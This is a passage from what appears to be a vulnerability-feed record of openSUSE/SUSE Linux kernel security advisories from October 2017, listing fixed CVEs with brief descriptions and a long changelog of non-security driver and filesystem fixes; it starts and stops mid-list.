- pci: Mark AMD Stoney GPU ATS as broken (bsc#1061046).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. mm_struct\n tracking' (bsc#1061831).\n - perf: xgene: Add APM X-Gene SoC Performance Monitoring Unit driver\n (bsc#1036737).\n - perf: xgene: Include module.h (bsc#1036737).\n - perf: xgene: Move PMU leaf functions into function pointer structure\n (bsc#1036737).\n - perf: xgene: Parse PMU subnode from the match table (bsc#1036737).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc/perf: Cleanup of PM_BR_CMPL vs. 
PM_BRU_CMPL in Power9 event list\n (bsc#1056686, fate#321438, bsc#1047238, git-fixes 34922527a2bc).\n - powerpc/perf: Factor out PPMU_ONLY_COUNT_RUN check code from power8\n (fate#321438, bsc#1053043, git-fixes efe881afdd999).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - rdma/bnxt_re: Allocate multiple notification queues (bsc#1037579).\n - rdma/bnxt_re: Implement the alloc/get_hw_stats callback (bsc#1037579).\n - Revert "net: fix percpu memory leaks" (bnc#1012382).\n - Revert "net: phy: Correctly process PHY_HALTED in phy_stop_machine()"\n (bnc#1012382).\n - Revert "net: use lib/percpu_counter API for fragmentation mem\n accounting" (bnc#1012382).\n - Revert "Update\n patches.fixes/xfs-refactor-log-record-unpack-and-data-processing.patch\n (bsc#1043598, bsc#1036215)."\n - Revert "xfs: detect and handle invalid iclog size set by mkfs\n (bsc#1043598)."\n - Revert "xfs: detect and trim torn writes during log recovery\n (bsc#1036215)."\n - Revert "xfs: refactor and open code log record crc check (bsc#1036215)."\n - Revert "xfs: refactor log record start detection into a new helper\n (bsc#1036215)."\n - Revert "xfs: return start block of first bad log record during recovery\n (bsc#1036215)."\n - Revert "xfs: support a crc verification only log record pass\n (bsc#1036215)."\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure (bsc#1059465).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: 
storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi_transport_fc: Also check for NOTPRESENT in fc_remote_port_add()\n (bsc#1037890).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1012382).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of "new" 64 bit SCSI LUN (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - smb: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - Update patches.drivers/0029-perf-xgene-Remove-bogus-IS_ERR-check.patch\n (bsc#1036737).\n - vfs: Return -ENXIO for negative 
SEEK_HOLE / SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - Workaround for kABI compatibility with DP-MST patches (bsc#1055493).\n - x86/cpu/amd: Hide unused legacy_fixup_core_id() function (bsc#1060229).\n - x86/cpu/amd: Limit cpu_core_id fixup to families older than F17h\n (bsc#1060229).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - x86/mm: Fix boot crash caused by incorrect loop count calculation in\n sync_global_pgds() (bsc#1058512).\n - x86/mm: Fix fault error path using unsafe vma pointer (fate#321300).\n\n", "edition": 1, "modified": "2017-10-17T15:15:08", "published": "2017-10-17T15:15:08", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00019.html", "id": "OPENSUSE-SU-2017:2741-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-25T16:31:52", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-13080", "CVE-2017-14489", "CVE-2017-15265", "CVE-2017-15649", "CVE-2017-1000252", "CVE-2017-11472", "CVE-2017-14106", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-6346", "CVE-2017-12154"], "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to 4.4.92 to receive\n various security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n - CVE-2017-11472: The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the 
Linux kernel did not flush the\n operand cache and causes a kernel stack dump, which allowed local users\n to obtain sensitive information from kernel memory and bypass the KASLR\n protection mechanism (in the kernel through 4.9) via a crafted ACPI\n table (bnc#1049580).\n - CVE-2017-12134: The xen_biovec_phys_mergeable function in\n drivers/xen/biomerge.c in Xen might allow local OS guest users to\n corrupt block device data streams and consequently obtain sensitive\n memory information, cause a denial of service, or gain host OS\n privileges by leveraging incorrect block IO merge-ability calculation\n (bnc#1051790 bsc#1053919).\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel. This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the "CR8-load exiting" and "CR8-store\n exiting" L0 vmcs02 controls exist in cases where L1 omits the "use TPR\n shadow" vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1056061 1063479 1063667 1063671).\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel allowed local users\n to cause a denial of service (memory corruption and system crash) by\n leveraging root access (bnc#1056588).\n - CVE-2017-14106: The tcp_disconnect function in 
net/ipv4/tcp.c in the\n Linux kernel allowed local users to cause a denial of service\n (__tcp_select_window divide-by-zero error and system crash) by\n triggering a disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-15265: Use-after-free vulnerability in the Linux kernel before\n 4.14-rc5 allowed local users to have unspecified impact via vectors\n related to /dev/snd/seq (bnc#1062520).\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bnc#1064388).\n\n The following non-security bugs were fixed:\n\n - acpi: apd: Add clock frequency for Hisilicon Hip07/08 I2C controller\n (bsc#1049291).\n - acpi: apd: Fix HID for Hisilicon Hip07/08 (bsc#1049291).\n - acpi: apei: Enable APEI multiple GHES source to share a single external\n IRQ (bsc#1053627).\n - acpica: iort: Update SMMU models for revision C (bsc#1036060).\n - acpi: irq: Fix return code of acpi_gsi_to_irq() (bsc#1053627).\n - acpi/nfit: Fix memory corruption/Unregister mce decoder on failure\n (bsc#1057047).\n - acpi: pci: fix GIC irq model default PCI IRQ polarity (bsc#1053629).\n - acpi/processor: Check for duplicate processor ids at hotplug time\n (bnc#1056230).\n - acpi/processor: Implement DEVICE operator for processor enumeration\n (bnc#1056230).\n - ahci: do not use MSI for devices with the silly Intel NVMe remapping\n scheme (bsc#1048912).\n - ahci: thunderx2: stop engine fix update (bsc#1057031).\n - alsa: au88x0: avoid theoretical uninitialized access 
(bnc#1012382).\n - alsa: compress: Remove unused variable (bnc#1012382).\n - alsa: hda - Add stereo mic quirk for Lenovo G50-70 (17aa:3978)\n (bsc#1020657).\n - alsa: hda - Implement mic-mute LED mode enum (bsc#1055013).\n - alsa: hda/realtek - Add support headphone Mic for ALC221 of HP platform\n (bsc#1024405).\n - alsa: hda - Workaround for i915 KBL breakage\n (bsc#1048356,bsc#1047989,bsc#1055272).\n - alsa: ice1712: Add support for STAudio ADCIII (bsc#1048934).\n - alsa: usb-audio: Apply sample rate quirk to Sennheiser headset\n (bsc#1052580).\n - alsa: usb-audio: Check out-of-bounds access by corrupted buffer\n descriptor (bnc#1012382).\n - alsa: usx2y: Suppress kernel warning at page allocation failures\n (bnc#1012382).\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: add function to get a cpu's MADT GICC table (bsc#1062279).\n - arm64: do not trace atomic operations (bsc#1055290).\n - arm64: dts: Add Broadcom Vulcan PMU in dts (fate#319481).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm64: mm: select CONFIG_ARCH_PROC_KCORE_TEXT (bsc#1046529).\n - arm64: pci: Fix struct acpi_pci_root_ops allocation failure path\n (bsc#1056849).\n - arm64/perf: Access pmu register using <read/write>_sys_reg (bsc#1062279).\n - arm64/perf: Add Broadcom Vulcan PMU support (fate#319481).\n - arm64/perf: Changed events naming as per the ARM ARM (fate#319481).\n - arm64/perf: Define complete ARMv8 recommended implementation defined\n events (fate#319481).\n - arm64: perf: do not expose CHAIN event in sysfs (bsc#1062279).\n - arm64: perf: Extend event config for ARMv8.1 (bsc#1062279).\n - arm64/perf: Filter common events based on PMCEIDn_EL0 (fate#319481).\n - arm64: perf: Ignore exclude_hv when kernel is running in HYP\n (bsc#1062279).\n - arm64: perf: move to common attr_group fields (bsc#1062279).\n - arm64: perf: Use the builtin_platform_driver 
(bsc#1062279).\n - arm64: pmu: add fallback probe table (bsc#1062279).\n - arm64: pmu: Hoist pmu platform device name (bsc#1062279).\n - arm64: pmu: Probe default hw/cache counters (bsc#1062279).\n - arm64: pmuv3: handle pmuv3+ (bsc#1062279).\n - arm64: pmuv3: handle !PMUv3 when probing (bsc#1062279).\n - arm64: pmuv3: use arm_pmu ACPI framework (bsc#1062279).\n - arm64: pmu: Wire-up Cortex A53 L2 cache events and DTLB refills\n (bsc#1062279).\n - arm: 8635/1: nommu: allow enabling REMAP_VECTORS_TO_RAM (bnc#1012382).\n - arm: dts: r8a7790: Use R-Car Gen 2 fallback binding for msiof nodes\n (bnc#1012382).\n - arm/perf: Convert to hotplug state machine (bsc#1062279).\n - arm/perf: Fix hotplug state machine conversion (bsc#1062279).\n - arm/perf: Use multi instance instead of custom list (bsc#1062279).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - arm: remove duplicate 'const' annotations' (bnc#1012382).\n - asoc: dapm: fix some pointer error handling (bnc#1012382).\n - asoc: dapm: handle probe deferrals (bnc#1012382).\n - audit: log 32-bit socketcalls (bnc#1012382).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - blacklist.conf: a7b8829d242b1a58107e9c02b09e93aec446d55c is not\n applicable\n - blacklist.conf: Add commit b5accbb0dfae\n - blacklist.conf: add one more\n - blacklist.conf: Blacklist d12fe87e62d7 signal/testing: Do not look for\n __SI_FAULT in userspace It just fixes a self-test.\n - blacklist.conf: e859afe1ee0c5ae981c55387ccd45eba258a7842 
is not\n applicable\n - blacklist.conf: fixes on relevant for MIPS/driver not in our tree\n - blacklist.conf: gcc7 compiler warning (bsc#1056849)\n - block: genhd: add device_add_disk_with_groups (bsc#1060400).\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - block: return on congested block device (FATE#321994).\n - bluetooth: bnep: fix possible might sleep error in bnep_session\n (bsc#1031784).\n - bluetooth: cmtp: fix possible might sleep error in cmtp_session\n (bsc#1031784).\n - bnx2x: Do not log mc removal needlessly (bsc#1019680 FATE#321692).\n - bnxt: add a missing rcu synchronization (bnc#1038583).\n - bnxt: do not busy-poll when link is down (bnc#1038583).\n - bnxt_en: Add a callback to inform RDMA driver during PCI shutdown\n (bsc#1053309).\n - bnxt_en: Add additional chip ID definitions (bsc#1053309).\n - bnxt_en: Add bnxt_get_num_stats() to centrally get the number of ethtool\n stats (bsc#1053309).\n - bnxt_en: Add missing logic to handle TPA end error conditions\n (bsc#1053309).\n - bnxt_en: Add PCI IDs for BCM57454 VF devices (bsc#1053309).\n - bnxt_en: Allow the user to set ethtool stats-block-usecs to 0\n (bsc#1053309).\n - bnxt_en: Call bnxt_dcb_init() after getting firmware DCBX configuration\n (bsc#1053309).\n - bnxt_en: Check status of firmware DCBX agent before setting\n DCB_CAP_DCBX_HOST (bsc#1053309).\n - bnxt_en: Do not setup MAC address in bnxt_hwrm_func_qcaps() (bsc#963575\n FATE#320144).\n - bnxt_en: Enable MRU enables bit when configuring VNIC MRU (bnc#1038583).\n - bnxt_en: Fix and clarify link_info->advertising (bnc#1038583).\n - bnxt_en: Fix a VXLAN vs GENEVE issue (bnc#1038583).\n - bnxt_en: Fix bug in ethtool -L (bsc#1053309).\n - bnxt_en: Fix netpoll handling (bsc#1053309).\n - bnxt_en: Fix NULL pointer dereference in a failure path during open\n (bnc#1038583).\n - bnxt_en: Fix NULL pointer dereference in reopen failure path\n (bnc#1038583).\n - bnxt_en: fix pci cleanup in bnxt_init_one() failure path 
(bnc#1038583).\n - bnxt_en: Fix race conditions in .ndo_get_stats64() (bsc#1053309).\n - bnxt_en: Fix ring arithmetic in bnxt_setup_tc() (bnc#1038583).\n - bnxt_en: Fix SRIOV on big-endian architecture (bsc#1053309).\n - bnxt_en: Fix TX push operation on ARM64 (bnc#1038583).\n - bnxt_en: Fix "uninitialized variable" bug in TPA code path (bnc#1038583).\n - bnxt_en: Fix VF virtual link state (bnc#1038583).\n - bnxt_en: Fix xmit_more with BQL (bsc#1053309).\n - bnxt_en: Free MSIX vectors when unregistering the device from bnxt_re\n (bsc#1020412 FATE#321671).\n - bnxt_en: Implement ndo_bridge_{get|set}link methods (bsc#1053309).\n - bnxt_en: Implement xmit_more (bsc#1053309).\n - bnxt_en: initialize rc to zero to avoid returning garbage (bnc#1038583).\n - bnxt_en: Optimize doorbell write operations for newer chips\n (bsc#1053309).\n - bnxt_en: Pad TX packets below 52 bytes (bnc#1038583).\n - bnxt_en: Pass in sh parameter to bnxt_set_dflt_rings() (bsc#1053309).\n - bnxt_en: Refactor TPA code path (bnc#1038583).\n - bnxt_en: Report firmware DCBX agent (bsc#1053309).\n - bnxt_en: Retrieve the hardware bridge mode from the firmware\n (bsc#1053309).\n - bnxt_en: Set ETS min_bw parameter for older firmware (bsc#1053309).\n - bnxt_en: Support for Short Firmware Message (bsc#1053309).\n - bnxt_en: Update firmware interface spec to 1.8.0 (bsc#1053309).\n - bnxt: fix unsigned comparsion with 0 (bsc#1053309).\n - bnxt: fix unused variable warnings (bsc#1053309).\n - bnxt_re: Do not issue cmd to delete GID for QP1 GID entry before the QP\n is destroyed (bsc#1056596).\n - bnxt_re: Fix compare and swap atomic operands (bsc#1056596).\n - bnxt_re: Fix memory leak in FRMR path (bsc#1056596).\n - bnxt_re: Fix race between the netdev register and unregister events\n (bsc#1037579).\n - bnxt_re: Fix update of qplib_qp.mtu when modified (bsc#1056596).\n - bnxt_re: Free up devices in module_exit path (bsc#1056596).\n - bnxt_re: Remove RTNL lock dependency in bnxt_re_query_port 
(bsc#1056596).\n - bnxt_re: Stop issuing further cmds to FW once a cmd times out\n (bsc#1056596).\n - brcmfmac: setup passive scan if requested by user-space (bnc#1012382).\n - bridge: netlink: register netdevice before executing changelink\n (bnc#1012382).\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: fix early ENOSPC due to delalloc (bsc#1049226).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: nowait aio: Correct assignment of pos (FATE#321994).\n - btrfs: nowait aio support (FATE#321994).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - ceph: avoid accessing freeing inode in ceph_check_delayed_caps()\n (bsc#1048228).\n - ceph: avoid invalid memory dereference in the middle of umount\n (bsc#1048228).\n - ceph: avoid panic in create_session_open_msg() if utsname() returns NULL\n (bsc#1061451).\n - ceph: check negative offsets in ceph_llseek() (bsc#1061451).\n - ceph: cleanup writepage_nounlock() (bsc#1048228).\n - ceph: do not re-send interrupted flock request (bsc#1048228).\n - ceph: fix message order check in handle_cap_export() (bsc#1061451).\n - ceph: fix NULL pointer dereference in ceph_flush_snaps() (bsc#1061451).\n - ceph: fix readpage from fscache (bsc#1057015).\n - ceph: getattr before read on ceph.* xattrs (bsc#1048228).\n - ceph: handle epoch barriers in cap messages (bsc#1048228).\n - ceph: limit osd read size to CEPH_MSG_MAX_DATA_LEN (bsc#1061451).\n - ceph: limit osd write size (bsc#1061451).\n - ceph: new mount option that specifies fscache uniquifier (bsc#1048228).\n - ceph: redirty page when writepage_nounlock() skips unwritable page\n (bsc#1048228).\n - ceph: remove special ack vs commit behavior 
(bsc#1048228).\n - ceph: remove useless page->mapping check in writepage_nounlock()\n (bsc#1048228).\n - ceph: re-request max size after importing caps (bsc#1048228).\n - ceph: stop on-going cached readdir if mds revokes FILE_SHARED cap\n (bsc#1061451).\n - ceph: update ceph_dentry_info::lease_session when necessary\n (bsc#1048228).\n - ceph: update the 'approaching max_size' code (bsc#1048228).\n - ceph: validate correctness of some mount options (bsc#1061451).\n - ceph: when seeing write errors on an inode, switch to sync writes\n (bsc#1048228).\n - cifs: add build_path_from_dentry_optional_prefix() (fate#323482).\n - cifs: add use_ipc flag to SMB2_ioctl() (fate#323482).\n - cifs: Fix maximum SMB2 header size (bsc#1056185).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: Fix sparse warnings (fate#323482).\n - cifs: implement get_dfs_refer for SMB2+ (fate#323482).\n - cifs: let ses->ipc_tid hold smb2 TreeIds (fate#323482).\n - cifs: move DFS response parsing out of SMB1 code (fate#323482).\n - cifs: release auth_key.response for reconnect (bnc#1012382).\n - cifs: remove any preceding delimiter from prefix_path (fate#323482).\n - cifs: set signing flag in SMB2+ TreeConnect if needed (fate#323482).\n - cifs: use DFS pathnames in SMB2+ Create requests (fate#323482).\n - clocksource/drivers/arm_arch_timer: Fix mem frame loop initialization\n (bsc#1055709).\n - cpufreq: intel_pstate: Disable energy efficiency optimization\n (bsc#1054654).\n - crush: assume weight_set != null imples weight_set_size > 0\n (bsc#1048228).\n - crush: crush_init_workspace starts with struct crush_work (bsc#1048228).\n - crush: implement weight and id overrides for straw2 (bsc#1048228).\n - crush: remove an obsolete comment (bsc#1048228).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: chcr - Add ctr mode and process large sg entries for cipher\n (bsc#1048325).\n - crypto: chcr - Avoid changing request structure 
(bsc#1048325).\n - crypto: chcr - Ensure Destination sg entry size less than 2k\n (bsc#1048325).\n - crypto: chcr - Fix fallback key setting (bsc#1048325).\n - crypto: chcr - Pass lcb bit setting to firmware (bsc#1048325).\n - crypto: chcr - Return correct error code (bsc#1048325).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - cxgb4: Fix stack out-of-bounds read due to wrong size to\n t4_record_mbox() (bsc#1021424 bsc#1022743).\n - cxgb4: update latest firmware version supported (bsc#1048327).\n - cxgbit: add missing __kfree_skb() (bsc#1052095).\n - cxgbit: fix sg_nents calculation (bsc#1052095).\n - cxl: Fix driver use count (bnc#1012382).\n - device-dax: fix cdev leak (bsc#1057047).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - dmaengine: mv_xor_v2: do not use descriptors not acked by async_tx\n (bsc#1056849).\n - dmaengine: mv_xor_v2: enable XOR engine after its configuration\n (bsc#1056849).\n - dmaengine: mv_xor_v2: fix tx_submit() implementation (bsc#1056849).\n - dmaengine: mv_xor_v2: handle mv_xor_v2_prep_sw_desc() error properly\n (bsc#1056849).\n - dmaengine: mv_xor_v2: properly handle wrapping in the array of HW\n descriptors (bsc#1056849).\n - dmaengine: mv_xor_v2: remove interrupt coalescing (bsc#1056849).\n - dmaengine: mv_xor_v2: set DMA mask to 40 bits (bsc#1056849).\n - dm mpath: do not lock up a CPU with requeuing activity (bsc#1048912).\n - documentation: arm64: pmu: Add Broadcom Vulcan PMU binding (fate#319481).\n - driver-core: platform: Add platform_irq_count() (bsc#1062279).\n - driver core: platform: Do not read past the end of "driver_override"\n buffer (bnc#1012382).\n - drivers: base: cacheinfo: fix boot error message when acpi is enabled\n (bsc#1057849).\n - drivers: firmware: psci: drop duplicate const from psci_of_match\n (FATE#319482 bnc#1012382).\n - drivers: hv: fcopy: restore correct transfer length (bnc#1012382).\n - 
drivers: net: phy: xgene: Fix mdio write (bsc#1057383).\n - drivers: net: xgene: Fix wrong logical operation (bsc#1056827).\n - drivers/perf: arm_pmu_acpi: avoid perf IRQ init when guest PMU is off\n (bsc#1062279).\n - drivers/perf: arm_pmu_acpi: Release memory obtained by kasprintf\n (bsc#1062279).\n - drivers/perf: arm_pmu: add ACPI framework (bsc#1062279).\n - drivers/perf: arm_pmu: add common attr group fields (bsc#1062279).\n - drivers/perf: arm_pmu: Always consider IRQ0 as an error (bsc#1062279).\n - drivers/perf: arm_pmu: Avoid leaking pmu->irq_affinity on error\n (bsc#1062279).\n - drivers/perf: arm_pmu: avoid NULL dereference when not using devicetree\n (bsc#1062279).\n - drivers/perf: arm-pmu: convert arm_pmu_mutex to spinlock (bsc#1062279).\n - drivers/perf: arm_pmu: Defer the setting of __oprofile_cpu_pmu\n (bsc#1062279).\n - drivers/perf: arm_pmu: define armpmu_init_fn (bsc#1062279).\n - drivers/perf: arm_pmu: expose a cpumask in sysfs (bsc#1062279).\n - drivers/perf: arm_pmu: factor out pmu registration (bsc#1062279).\n - drivers/perf: arm-pmu: Fix handling of SPI lacking "interrupt-affinity"\n property (bsc#1062279).\n - drivers/perf: arm_pmu: Fix NULL pointer dereference during probe\n (bsc#1062279).\n - drivers/perf: arm-pmu: fix RCU usage on pmu resume from low-power\n (bsc#1062279).\n - drivers/perf: arm_pmu: Fix reference count of a device_node in\n of_pmu_irq_cfg (bsc#1062279).\n - drivers/perf: arm_pmu: fold init into alloc (bsc#1062279).\n - drivers/perf: arm_pmu: handle no platform_device (bsc#1062279).\n - drivers/perf: arm-pmu: Handle per-interrupt affinity mask (bsc#1062279).\n - drivers/perf: arm_pmu: implement CPU_PM notifier (bsc#1062279).\n - drivers/perf: arm_pmu: make info messages more verbose (bsc#1062279).\n - drivers/perf: arm_pmu: manage interrupts per-cpu (bsc#1062279).\n - drivers/perf: arm_pmu: move irq request/free into probe (bsc#1062279).\n - drivers/perf: arm_pmu: only use common attr_groups (bsc#1062279).\n - 
drivers/perf: arm_pmu: remove pointless PMU disabling (bsc#1062279).\n - drivers/perf: arm_pmu: rename irq request/free functions (bsc#1062279).\n - drivers/perf: arm_pmu: Request PMU SPIs with IRQF_PER_CPU (bsc#1062279).\n - drivers/perf: arm_pmu: rework per-cpu allocation (bsc#1062279).\n - drivers/perf: arm_pmu: simplify cpu_pmu_request_irqs() (bsc#1062279).\n - drivers/perf: arm_pmu: split cpu-local irq request/free (bsc#1062279).\n - drivers/perf: arm_pmu: split irq request from enable (bsc#1062279).\n - drivers/perf: arm_pmu: split out platform device probe logic\n (bsc#1062279).\n - drivers/perf: kill armpmu_register (bsc#1062279).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/amdkfd: fix improper return value on error (bnc#1012382).\n - drm: bridge: add DT bindings for TI ths8135 (bnc#1012382).\n - drm/dp: Introduce MST topology state to track available link bandwidth\n (bsc#1055493).\n - drm_fourcc: Fix DRM_FORMAT_MOD_LINEAR #define (bnc#1012382).\n - drm/i915/bios: ignore HDMI on port A (bnc#1012382).\n - drm/vmwgfx: Limit max desktop dimensions to 8Kx8K (bsc#1048155).\n - e1000e: use disable_hardirq() also for MSIX vectors in e1000_netpoll()\n (bsc#1022912 FATE#321246).\n - edac, sb_edac: Assign EDAC memory controller per h/w controller\n (bsc#1061721).\n - edac, sb_edac: Avoid creating SOCK memory controller (bsc#1061721).\n - edac, sb_edac: Bump driver version and do some cleanups (bsc#1061721).\n - edac, sb_edac: Carve out dimm-populating loop (bsc#1061721).\n - edac, sb_edac: Check if ECC enabled when at least one DIMM is present\n (bsc#1061721).\n - edac, sb_edac: Classify memory mirroring modes (bsc#1061721).\n - edac, sb_edac: Classify PCI-IDs by topology (bsc#1061721).\n - edac, sb_edac: Do not create a second memory controller if HA1 is not\n present (bsc#1061721).\n - edac, sb_edac: Do not use "Socket#" in the memory controller name\n (bsc#1061721).\n - edac, sb_edac: Drop NUM_CHANNELS from 8 back to 4 
(bsc#1061721).\n - edac, sb_edac: Fix mod_name (bsc#1061721).\n - edac, sb_edac: Get rid of ->show_interleave_mode() (bsc#1061721).\n - edac, sb_edac: Remove double buffering of error records (bsc#1061721).\n - edac, sb_edac: Remove NULL pointer check on array pci_tad (bsc#1061721).\n - edac, skx_edac: Handle systems with segmented PCI busses (bsc#1063102).\n - edac, thunderx: Fix a warning during l2c debugfs node creation\n (bsc#1057038).\n - edac, thunderx: Fix error handling path in thunderx_lmc_probe()\n (bsc#1057038).\n - efi/fb: Avoid reconfiguration of BAR that covers the framebuffer\n (bsc#1051987).\n - efi/fb: Correct PCI_STD_RESOURCE_END usage (bsc#1051987).\n - ext4: do not allow encrypted operations without keys (bnc#1012382).\n - ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - ext4: nowait aio support (FATE#321994).\n - extcon: axp288: Use vbus-valid instead of -present to determine cable\n presence (bnc#1012382).\n - exynos-gsc: Do not swap cb/cr for semi planar formats (bnc#1012382).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - fix flags ordering (bsc#1034075 comment 131)\n - Fix mpage_writepage() for pages with buffers (bsc#1050471).\n - fix whitespace according to upstream commit\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - fs/epoll: cache leftmost node (bsc#1056427).\n - fs: Introduce filemap_range_has_page() (FATE#321994).\n - fs: Introduce RWF_NOWAIT and FMODE_AIO_NOWAIT (FATE#321994).\n - fs/mpage.c: fix mpage_writepage() for pages with buffers (bsc#1050471).\n Update to version in mainline\n - fs/proc: kcore: use kcore_list type to check for vmalloc/module address\n (bsc#1046529).\n - fs: return if direct I/O will trigger writeback (FATE#321994).\n - fs: Separate out kiocb flags setup based on RWF_* flags (FATE#321994).\n - fs: Use RWF_* flags for AIO operations (FATE#321994).\n - 
